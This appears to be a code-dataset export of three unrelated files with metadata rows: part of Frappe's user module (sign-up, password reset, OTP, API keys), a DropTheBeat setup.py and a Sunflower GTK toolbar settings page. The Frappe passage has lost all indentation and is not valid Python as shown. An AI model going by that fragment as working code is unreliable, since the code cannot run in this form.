@frappe.whitelist()
def has_email_account(email):
return frappe.get_list("Email Account", filters={"email_id": email})
@frappe.whitelist(allow_guest=False)
def get_email_awaiting(user):
waiting = frappe.db.sql("""select email_account,email_id
from `tabUser Email`
where awaiting_password = 1
and parent = %(user)s""", {"user":user}, as_dict=1)
if waiting:
return waiting
else:
frappe.db.sql("""update `tabUser Email`
set awaiting_password =0
where parent = %(user)s""",{"user":user})
return False
@frappe.whitelist(allow_guest=False)
def set_email_password(email_account, user, password):
account = frappe.get_doc("Email Account", email_account)
if account.awaiting_password:
account.awaiting_password = 0
account.password = password
try:
account.save(ignore_permissions=True)
except Exception:
frappe.db.rollback()
return False
return True
def setup_user_email_inbox(email_account, awaiting_password, email_id, enable_outgoing):
""" setup email inbox for user """
def add_user_email(user):
user = frappe.get_doc("User", user)
row = user.append("user_emails", {})
row.email_id = email_id
row.email_account = email_account
row.awaiting_password = awaiting_password or 0
row.enable_outgoing = enable_outgoing or 0
user.save(ignore_permissions=True)
udpate_user_email_settings = False
if not all([email_account, email_id]):
return
user_names = frappe.db.get_values("User", { "email": email_id }, as_dict=True)
if not user_names:
return
for user in user_names:
user_name = user.get("name")
# check if inbox is alreay configured
user_inbox = frappe.db.get_value("User Email", {
"email_account": email_account,
"parent": user_name
}, ["name"]) or None
if not user_inbox:
add_user_email(user_name)
else:
# update awaiting password for email account
udpate_user_email_settings = True
if udpate_user_email_settings:
frappe.db.sql("""UPDATE `tabUser Email` SET awaiting_password = %(awaiting_password)s,
enable_outgoing = %(enable_outgoing)s WHERE email_account = %(email_account)s""", {
"email_account": email_account,
"enable_outgoing": enable_outgoing,
"awaiting_password": awaiting_password or 0
})
else:
users = " and ".join([frappe.bold(user.get("name")) for user in user_names])
frappe.msgprint(_("Enabled email inbox for user {0}").format(users))
ask_pass_update()
def remove_user_email_inbox(email_account):
""" remove user email inbox settings if email account is deleted """
if not email_account:
return
users = frappe.get_all("User Email", filters={
"email_account": email_account
}, fields=["parent as name"])
for user in users:
doc = frappe.get_doc("User", user.get("name"))
to_remove = [ row for row in doc.user_emails if row.email_account == email_account ]
[ doc.remove(row) for row in to_remove ]
doc.save(ignore_permissions=True)
def ask_pass_update():
# update the sys defaults as to awaiting users
from frappe.utils import set_default
users = frappe.db.sql("""SELECT DISTINCT(parent) as user FROM `tabUser Email`
WHERE awaiting_password = 1""", as_dict=True)
password_list = [ user.get("user") for user in users ]
set_default("email_user_password", u','.join(password_list))
def _get_user_for_update_password(key, old_password):
# verify old password
if key:
user = frappe.db.get_value("User", {"reset_password_key": key})
if not user:
return {
'message': _("The Link specified has either been used before or Invalid")
}
elif old_password:
# verify old password
frappe.local.login_manager.check_password(frappe.session.user, old_password)
user = frappe.session.user
else:
return
return {
'user': user
}
def reset_user_data(user):
user_doc = frappe.get_doc("User", user)
redirect_url = user_doc.redirect_url
user_doc.reset_password_key = ''
user_doc.redirect_url = ''
user_doc.save(ignore_permissions=True)
return user_doc, redirect_url
@frappe.whitelist()
def verify_password(password):
frappe.local.login_manager.check_password(frappe.session.user, password)
@frappe.whitelist(allow_guest=True)
def sign_up(email, full_name, redirect_to):
if not is_signup_enabled():
frappe.throw(_('Sign Up is disabled'), title='Not Allowed')
user = frappe.db.get("User", {"email": email})
if user:
if user.disabled:
return 0, _("Registered but disabled")
else:
return 0, _("Already Registered")
else:
if frappe.db.sql("""select count(*) from tabUser where
HOUR(TIMEDIFF(CURRENT_TIMESTAMP, TIMESTAMP(modified)))=1""")[0][0] > 300:
frappe.respond_as_web_page(_('Temporarily Disabled'),
_('Too many users signed up recently, so the registration is disabled. Please try back in an hour'),
http_status_code=429)
from frappe.utils import random_string
user = frappe.get_doc({
"doctype":"User",
"email": email,
"first_name": escape_html(full_name),
"enabled": 1,
"new_password": random_string(10),
"user_type": "Website User"
})
user.flags.ignore_permissions = True
user.flags.ignore_password_policy = True
user.insert()
# set default signup role as per Portal Settings
default_role = frappe.db.get_value("Portal Settings", None, "default_role")
if default_role:
user.add_roles(default_role)
if redirect_to:
frappe.cache().hset('redirect_after_login', user.name, redirect_to)
if user.flags.email_sent:
return 1, _("Please check your email for verification")
else:
return 2, _("Please ask your administrator to verify your sign-up")
@frappe.whitelist(allow_guest=True)
@rate_limit(key='user', limit=get_password_reset_limit, seconds = 24*60*60, methods=['POST'])
def reset_password(user):
if user=="Administrator":
return 'not allowed'
try:
user = frappe.get_doc("User", user)
if not user.enabled:
return 'disabled'
user.validate_reset_password()
user.reset_password(send_email=True)
return frappe.msgprint(_("Password reset instructions have been sent to your email"))
except frappe.DoesNotExistError:
frappe.clear_messages()
return 'not found'
@frappe.whitelist()
@frappe.validate_and_sanitize_search_inputs
def user_query(doctype, txt, searchfield, start, page_len, filters):
from frappe.desk.reportview import get_match_cond, get_filters_cond
conditions=[]
user_type_condition = "and user_type != 'Website User'"
if filters and filters.get('ignore_user_type'):
user_type_condition = ''
filters.pop('ignore_user_type')
txt = "%{}%".format(txt)
return frappe.db.sql("""SELECT `name`, CONCAT_WS(' ', first_name, middle_name, last_name)
FROM `tabUser`
WHERE `enabled`=1
{user_type_condition}
AND `docstatus` < 2
AND `name` NOT IN ({standard_users})
AND ({key} LIKE %(txt)s
OR CONCAT_WS(' ', first_name, middle_name, last_name) LIKE %(txt)s)
{fcond} {mcond}
ORDER BY
CASE WHEN `name` LIKE %(txt)s THEN 0 ELSE 1 END,
CASE WHEN concat_ws(' ', first_name, middle_name, last_name) LIKE %(txt)s
THEN 0 ELSE 1 END,
NAME asc
LIMIT %(page_len)s OFFSET %(start)s
""".format(
user_type_condition = user_type_condition,
standard_users=", ".join([frappe.db.escape(u) for u in STANDARD_USERS]),
key=searchfield,
fcond=get_filters_cond(doctype, filters, conditions),
mcond=get_match_cond(doctype)
),
dict(start=start, page_len=page_len, txt=txt)
)
def get_total_users():
"""Returns total no. of system users"""
return flt(frappe.db.sql('''SELECT SUM(`simultaneous_sessions`)
FROM `tabUser`
WHERE `enabled` = 1
AND `user_type` = 'System User'
AND `name` NOT IN ({})'''.format(", ".join(["%s"]*len(STANDARD_USERS))), STANDARD_USERS)[0][0])
def get_system_users(exclude_users=None, limit=None):
if not exclude_users:
exclude_users = []
elif not isinstance(exclude_users, (list, tuple)):
exclude_users = [exclude_users]
limit_cond = ''
if limit:
limit_cond = 'limit {0}'.format(limit)
exclude_users += list(STANDARD_USERS)
system_users = frappe.db.sql_list("""select name from `tabUser`
where enabled=1 and user_type != 'Website User'
and name not in ({}) {}""".format(", ".join(["%s"]*len(exclude_users)), limit_cond),
exclude_users)
return system_users
def get_active_users():
"""Returns No. of system users who logged in, in the last 3 days"""
return frappe.db.sql("""select count(*) from `tabUser`
where enabled = 1 and user_type != 'Website User'
and name not in ({})
and hour(timediff(now(), last_active)) < 72""".format(", ".join(["%s"]*len(STANDARD_USERS))), STANDARD_USERS)[0][0]
def get_website_users():
"""Returns total no. of website users"""
return frappe.db.sql("""select count(*) from `tabUser`
where enabled = 1 and user_type = 'Website User'""")[0][0]
def get_active_website_users():
"""Returns No. of website users who logged in, in the last 3 days"""
return frappe.db.sql("""select count(*) from `tabUser`
where enabled = 1 and user_type = 'Website User'
and hour(timediff(now(), last_active)) < 72""")[0][0]
def get_permission_query_conditions(user):
if user=="Administrator":
return ""
else:
return """(`tabUser`.name not in ({standard_users}))""".format(
standard_users = ", ".join(frappe.db.escape(user) for user in STANDARD_USERS))
def has_permission(doc, user):
if (user != "Administrator") and (doc.name in STANDARD_USERS):
# dont allow non Administrator user to view / edit Administrator user
return False
def notify_admin_access_to_system_manager(login_manager=None):
if (login_manager
and login_manager.user == "Administrator"
and frappe.local.conf.notify_admin_access_to_system_manager):
site = '<a href="{0}" target="_blank">{0}</a>'.format(frappe.local.request.host_url)
date_and_time = '<b>{0}</b>'.format(format_datetime(now_datetime(), format_string="medium"))
ip_address = frappe.local.request_ip
access_message = _('Administrator accessed {0} on {1} via IP Address {2}.').format(
site, date_and_time, ip_address)
frappe.sendmail(
recipients=get_system_managers(),
subject=_("Administrator Logged In"),
template="administrator_logged_in",
args={'access_message': access_message},
header=['Access Notification', 'orange']
)
def extract_mentions(txt):
"""Find all instances of @mentions in the html."""
soup = BeautifulSoup(txt, 'html.parser')
emails = []
for mention in soup.find_all(class_='mention'):
if mention.get('data-is-group') == 'true':
try:
user_group = frappe.get_cached_doc('User Group', mention['data-id'])
emails += [d.user for d in user_group.user_group_members]
except frappe.DoesNotExistError:
pass
continue
email = mention['data-id']
emails.append(email)
return emails
def handle_password_test_fail(result):
suggestions = result['feedback']['suggestions'][0] if result['feedback']['suggestions'] else ''
warning = result['feedback']['warning'] if 'warning' in result['feedback'] else ''
suggestions += "<br>" + _("Hint: Include symbols, numbers and capital letters in the password") + '<br>'
frappe.throw(' '.join([_('Invalid Password:'), warning, suggestions]))
def update_gravatar(name):
gravatar = has_gravatar(name)
if gravatar:
frappe.db.set_value('User', name, 'user_image', gravatar)
@frappe.whitelist(allow_guest=True)
def send_token_via_sms(tmp_id,phone_no=None,user=None):
try:
from frappe.core.doctype.sms_settings.sms_settings import send_request
except:
return False
if not frappe.cache().ttl(tmp_id + '_token'):
return False
ss = frappe.get_doc('SMS Settings', 'SMS Settings')
if not ss.sms_gateway_url:
return False
token = frappe.cache().get(tmp_id + '_token')
args = {ss.message_parameter: 'verification code is {}'.format(token)}
for d in ss.get("parameters"):
args[d.parameter] = d.value
if user:
user_phone = frappe.db.get_value('User', user, ['phone','mobile_no'], as_dict=1)
usr_phone = user_phone.mobile_no or user_phone.phone
if not usr_phone:
return False
else:
if phone_no:
usr_phone = phone_no
else:
return False
args[ss.receiver_parameter] = usr_phone
status = send_request(ss.sms_gateway_url, args, use_post=ss.use_post)
if 200 <= status < 300:
frappe.cache().delete(tmp_id + '_token')
return True
else:
return False
@frappe.whitelist(allow_guest=True)
def send_token_via_email(tmp_id,token=None):
import pyotp
user = frappe.cache().get(tmp_id + '_user')
count = token or frappe.cache().get(tmp_id + '_token')
if ((not user) or (user == 'None') or (not count)):
return False
user_email = frappe.db.get_value('User',user, 'email')
if not user_email:
return False
otpsecret = frappe.cache().get(tmp_id + '_otp_secret')
hotp = pyotp.HOTP(otpsecret)
frappe.sendmail(
recipients=user_email,
sender=None,
subject="Verification Code",
template="verification_code",
args=dict(code=hotp.at(int(count))),
delayed=False,
retry=3
)
return True
@frappe.whitelist(allow_guest=True)
def reset_otp_secret(user):
otp_issuer = frappe.db.get_value('System Settings', 'System Settings', 'otp_issuer_name')
user_email = frappe.db.get_value('User',user, 'email')
if frappe.session.user in ["Administrator", user] :
frappe.defaults.clear_default(user + '_otplogin')
frappe.defaults.clear_default(user + '_otpsecret')
email_args = {
'recipients':user_email, 'sender':None, 'subject':'OTP Secret Reset - {}'.format(otp_issuer or "Frappe Framework"),
'message':'<p>Your OTP secret on {} has been reset. If you did not perform this reset and did not request it, please contact your System Administrator immediately.</p>'.format(otp_issuer or "Frappe Framework"),
'delayed':False,
'retry':3
}
enqueue(method=frappe.sendmail, queue='short', timeout=300, event=None, is_async=True, job_name=None, now=False, **email_args)
return frappe.msgprint(_("OTP Secret has been reset. Re-registration will be required on next login."))
else:
return frappe.throw(_("OTP secret can only be reset by the Administrator."))
def throttle_user_creation():
if frappe.flags.in_import:
return
if frappe.db.get_creation_count('User', 60) > frappe.local.conf.get("throttle_user_limit", 60):
frappe.throw(_('Throttled'))
@frappe.whitelist()
def get_role_profile(role_profile):
roles = frappe.get_doc('Role Profile', {'role_profile': role_profile})
return roles.roles
@frappe.whitelist()
def get_module_profile(module_profile):
module_profile = frappe.get_doc('Module Profile', {'module_profile_name': module_profile})
return module_profile.get('block_modules')
def update_roles(role_profile):
users = frappe.get_all('User', filters={'role_profile_name': role_profile})
role_profile = frappe.get_doc('Role Profile', role_profile)
roles = [role.role for role in role_profile.roles]
for d in users:
user = frappe.get_doc('User', d)
user.set('roles', [])
user.add_roles(*roles)
def create_contact(user, ignore_links=False, ignore_mandatory=False):
from frappe.contacts.doctype.contact.contact import get_contact_name
if user.name in ["Administrator", "Guest"]: return
contact_name = get_contact_name(user.email)
if not contact_name:
contact = frappe.get_doc({
"doctype": "Contact",
"first_name": user.first_name,
"last_name": user.last_name,
"user": user.name,
"gender": user.gender,
})
if user.email:
contact.add_email(user.email, is_primary=True)
if user.phone:
contact.add_phone(user.phone, is_primary_phone=True)
if user.mobile_no:
contact.add_phone(user.mobile_no, is_primary_mobile_no=True)
contact.insert(ignore_permissions=True, ignore_links=ignore_links, ignore_mandatory=ignore_mandatory)
else:
contact = frappe.get_doc("Contact", contact_name)
contact.first_name = user.first_name
contact.last_name = user.last_name
contact.gender = user.gender
# Add mobile number if phone does not exists in contact
if user.phone and not any(new_contact.phone == user.phone for new_contact in contact.phone_nos):
# Set primary phone if there is no primary phone number
contact.add_phone(
user.phone,
is_primary_phone=not any(
new_contact.is_primary_phone == 1 for new_contact in contact.phone_nos
)
)
# Add mobile number if mobile does not exists in contact
if user.mobile_no and not any(new_contact.phone == user.mobile_no for new_contact in contact.phone_nos):
# Set primary mobile if there is no primary mobile number
contact.add_phone(
user.mobile_no,
is_primary_mobile_no=not any(
new_contact.is_primary_mobile_no == 1 for new_contact in contact.phone_nos
)
)
contact.save(ignore_permissions=True)
@frappe.whitelist()
def generate_keys(user):
"""
generate api key and api secret
:param user: str
"""
if "System Manager" in frappe.get_roles():
user_details = frappe.get_doc("User", user)
api_secret = frappe.generate_hash(length=15)
# if api key is not set generate api key
if not user_details.api_key:
api_key = frappe.generate_hash(length=15)
user_details.api_key = api_key
user_details.api_secret = api_secret
user_details.save()
return {"api_secret": api_secret}
frappe.throw(frappe._("Not Permitted"), frappe.PermissionError)
@frappe.whitelist()
def switch_theme(theme):
if theme in ["Dark", "Light"]:
frappe.db.set_value("User", frappe.session.user, "desk_theme", theme)
| mit | -1,635,436,983,036,877,300 | 31.306634 | 213 | 0.69565 | false |
jacebrowning/dropthebeat | setup.py | 1 | 2371 | #!/usr/bin/env python
"""Setup script for DropTheBeat."""
import os
import sys
import setuptools
PACKAGE_NAME = 'dtb'
MINIMUM_PYTHON_VERSION = 3, 4
def check_python_version():
"""Exit when the Python version is too low."""
if sys.version_info < MINIMUM_PYTHON_VERSION:
sys.exit("Python {}.{}+ is required.".format(*MINIMUM_PYTHON_VERSION))
def read_package_variable(key):
"""Read the value of a variable from the package without importing."""
module_path = os.path.join(PACKAGE_NAME, '__init__.py')
with open(module_path) as module:
for line in module:
parts = line.strip().split(' ')
if parts and parts[0] == key:
return parts[-1].strip("'")
assert 0, "'{0}' not found in '{1}'".format(key, module_path)
def read_descriptions():
"""Build a description for the project from documentation files."""
try:
readme = open("README.rst").read()
changelog = open("CHANGELOG.rst").read()
except IOError:
return "<placeholder>"
else:
return readme + '\n' + changelog
check_python_version()
setuptools.setup(
name=read_package_variable('__project__'),
version=read_package_variable('__version__'),
description="Music sharing using Dropbox.",
url='https://github.com/jacebrowning/dropthebeat',
author='Jace Browning',
author_email='[email protected]',
packages=setuptools.find_packages(),
entry_points={'console_scripts': ['dtb = dtb.cli:main',
'DropTheBeat = dtb.gui:main']},
long_description=read_descriptions(),
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Environment :: MacOS X',
'Environment :: Win32 (MS Windows)',
'Environment :: X11 Applications',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Communications :: File Sharing',
'Topic :: Multimedia :: Sound/Audio',
],
install_requires=open("requirements.txt").readlines(),
)
| lgpl-3.0 | 5,393,324,607,916,161,000 | 29.397436 | 78 | 0.609869 | false |
MeanEYE/Sunflower | sunflower/gui/preferences/toolbar.py | 1 | 8025 | import json
from gi.repository import Gtk
from sunflower.widgets.settings_page import SettingsPage
class Column:
NAME = 0
DESCRIPTION = 1
TYPE = 2
ICON = 3
CONFIG = 4
class ToolbarOptions(SettingsPage):
"""Toolbar options extension class"""
def __init__(self, parent, application):
SettingsPage.__init__(self, parent, application, 'toolbar', _('Toolbar'))
self._toolbar_manager = self._application.toolbar_manager
# create list box
container = Gtk.ScrolledWindow()
container.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.ALWAYS)
container.set_shadow_type(Gtk.ShadowType.IN)
self._store = Gtk.ListStore(str, str, str, str, str)
self._list = Gtk.TreeView()
self._list.set_model(self._store)
cell_icon = Gtk.CellRendererPixbuf()
cell_name = Gtk.CellRendererText()
cell_name.set_property('editable', True)
cell_name.set_property('mode', Gtk.CellRendererMode.EDITABLE)
cell_name.connect('edited', self._edited_name, 0)
cell_type = Gtk.CellRendererText()
# create name column
col_name = Gtk.TreeViewColumn(_('Name'))
col_name.set_min_width(200)
col_name.set_resizable(True)
# pack and configure renderes
col_name.pack_start(cell_icon, False)
col_name.pack_start(cell_name, True)
col_name.add_attribute(cell_icon, 'icon-name', Column.ICON)
col_name.add_attribute(cell_name, 'text', Column.NAME)
# create type column
col_type = Gtk.TreeViewColumn(_('Type'), cell_type, markup=Column.DESCRIPTION)
col_type.set_resizable(True)
col_type.set_expand(True)
# add columns to the list
self._list.append_column(col_name)
self._list.append_column(col_type)
container.add(self._list)
# create controls
button_box = Gtk.HBox(False, 5)
button_add = Gtk.Button(stock=Gtk.STOCK_ADD)
button_add.connect('clicked', self._add_widget)
button_delete = Gtk.Button(stock=Gtk.STOCK_DELETE)
button_delete.connect('clicked', self._delete_widget)
button_edit = Gtk.Button(stock=Gtk.STOCK_EDIT)
button_edit.connect('clicked', self._edit_widget)
image_up = Gtk.Image()
image_up.set_from_stock(Gtk.STOCK_GO_UP, Gtk.IconSize.BUTTON)
button_move_up = Gtk.Button(label=None)
button_move_up.add(image_up)
button_move_up.set_tooltip_text(_('Move Up'))
button_move_up.connect('clicked', self._move_widget, -1)
image_down = Gtk.Image()
image_down.set_from_stock(Gtk.STOCK_GO_DOWN, Gtk.IconSize.BUTTON)
button_move_down = Gtk.Button(label=None)
button_move_down.add(image_down)
button_move_down.set_tooltip_text(_('Move Down'))
button_move_down.connect('clicked', self._move_widget, 1)
# pack ui
button_box.pack_start(button_add, False, False, 0)
button_box.pack_start(button_delete, False, False, 0)
button_box.pack_start(button_edit, False, False, 0)
button_box.pack_end(button_move_down, False, False, 0)
button_box.pack_end(button_move_up, False, False, 0)
# toolbar style
label_style = Gtk.Label(label=_('Toolbar style:'))
list_styles = Gtk.ListStore(str, int)
list_styles.append((_('Icons'), Gtk.ToolbarStyle.ICONS))
list_styles.append((_('Text'), Gtk.ToolbarStyle.TEXT))
list_styles.append((_('Both'), Gtk.ToolbarStyle.BOTH))
list_styles.append((_('Both horizontal'), Gtk.ToolbarStyle.BOTH_HORIZ))
renderer = Gtk.CellRendererText()
self._combobox_styles = Gtk.ComboBox(model=list_styles)
self._combobox_styles.pack_start(renderer, True)
self._combobox_styles.add_attribute(renderer, 'text', 0)
self._combobox_styles.connect('changed', self._parent.enable_save)
# toolbar icon size
label_icon_size = Gtk.Label(label=_('Icon size:'))
list_icon_size = Gtk.ListStore(str, int)
list_icon_size.append((_('Small toolbar icon'), Gtk.IconSize.SMALL_TOOLBAR))
list_icon_size.append((_('Large toolbar icon'), Gtk.IconSize.LARGE_TOOLBAR))
list_icon_size.append((_('Same as drag icons'), Gtk.IconSize.DND))
list_icon_size.append((_('Same as dialog'), Gtk.IconSize.DIALOG))
renderer = Gtk.CellRendererText()
self._combobox_icon_size = Gtk.ComboBox(model=list_icon_size)
self._combobox_icon_size.pack_start(renderer, True)
self._combobox_icon_size.add_attribute(renderer, 'text', 0)
self._combobox_icon_size.connect('changed', self._parent.enable_save)
style_box = Gtk.HBox(False, 5)
style_box.pack_start(label_style, False, False, 0)
style_box.pack_start(self._combobox_styles, False, False, 0)
size_box = Gtk.HBox(False, 5)
size_box.pack_start(label_icon_size, False, False, 0)
size_box.pack_start(self._combobox_icon_size, False, False, 0)
self.pack_start(style_box, False, False, 0)
self.pack_start(size_box, False, False, 0)
self.pack_start(container, True, True, 0)
self.pack_start(button_box, False, False, 0)
def _add_widget(self, widget, data=None):
"""Show dialog for creating toolbar widget"""
widget_added = self._toolbar_manager.show_create_widget_dialog(self._parent)
if widget_added:
self._add_item_to_list(widget_added)
# enable save button
self._parent.enable_save()
def _delete_widget(self, widget, data=None):
"""Delete selected toolbar widget"""
selection = self._list.get_selection()
list_, iter_ = selection.get_selected()
if iter_ is not None:
# remove item from list
list_.remove(iter_)
# enable save button if item was removed
self._parent.enable_save()
def _edited_name(self, cell, path, text, column):
"""Record edited text"""
selected_iter = self._store.get_iter(path)
if selected_iter is not None:
self._store.set_value(selected_iter, column, text)
# enable save button
self._parent.enable_save()
def _edit_widget(self, widget, data=None):
"""Edit selected toolbar widget"""
selection = self._list.get_selection()
list_, iter_ = selection.get_selected()
if iter_ is not None:
name = list_.get_value(iter_, Column.NAME)
widget_type = list_.get_value(iter_, Column.TYPE)
widget_config = list_.get_value(iter_, Column.CONFIG)
edited = self._toolbar_manager.show_configure_widget_dialog(
name,
widget_type,
json.loads(widget_config),
self._parent
)
# enable save button
if edited:
self._store.set_value(iter_, Column.CONFIG, json.dumps(edited))
self._parent.enable_save()
def _move_widget(self, widget, direction):
"""Move selected bookmark up"""
selection = self._list.get_selection()
list_, iter_ = selection.get_selected()
if iter_ is not None:
# get iter index
index = list_.get_path(iter_)[0]
# depending on direction, swap iters
if (direction == -1 and index > 0) \
or (direction == 1 and index < len(list_) - 1):
list_.swap(iter_, list_[index + direction].iter)
# enable save button if iters were swapped
self._parent.enable_save()
def _add_item_to_list(self, item):
name = item['name']
widget_type = item['type']
widget_config = item['config'] if 'config' in item else {}
data = self._toolbar_manager.get_widget_data(widget_type)
if data is not None:
icon = data[1]
description = data[0]
else: # failsafe, display raw widget type
icon = ''
description = '{0} <small><i>({1})</i></small>'.format(widget_type, _('missing plugin'))
self._store.append((name, description, widget_type, icon, json.dumps(widget_config)))
def _load_options(self):
"""Load options from file"""
options = self._application.toolbar_options
self._combobox_styles.set_active(options.get('style'))
self._combobox_icon_size.set_active(options.get('icon_size'))
# clear list store
self._store.clear()
for item in options.get('items'):
self._add_item_to_list(item)
def _save_options(self):
"""Save settings to config file"""
options = self._application.toolbar_options
options.set('style', self._combobox_styles.get_active())
options.set('icon_size', self._combobox_icon_size.get_active())
# save toolbar items settings
items = []
for data in self._store:
items.append({
'name': data[Column.NAME],
'type': data[Column.TYPE],
'config': json.loads(data[Column.CONFIG]),
})
options.set('items', items)
| gpl-3.0 | -8,279,819,229,029,512,000 | 30.470588 | 91 | 0.694704 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.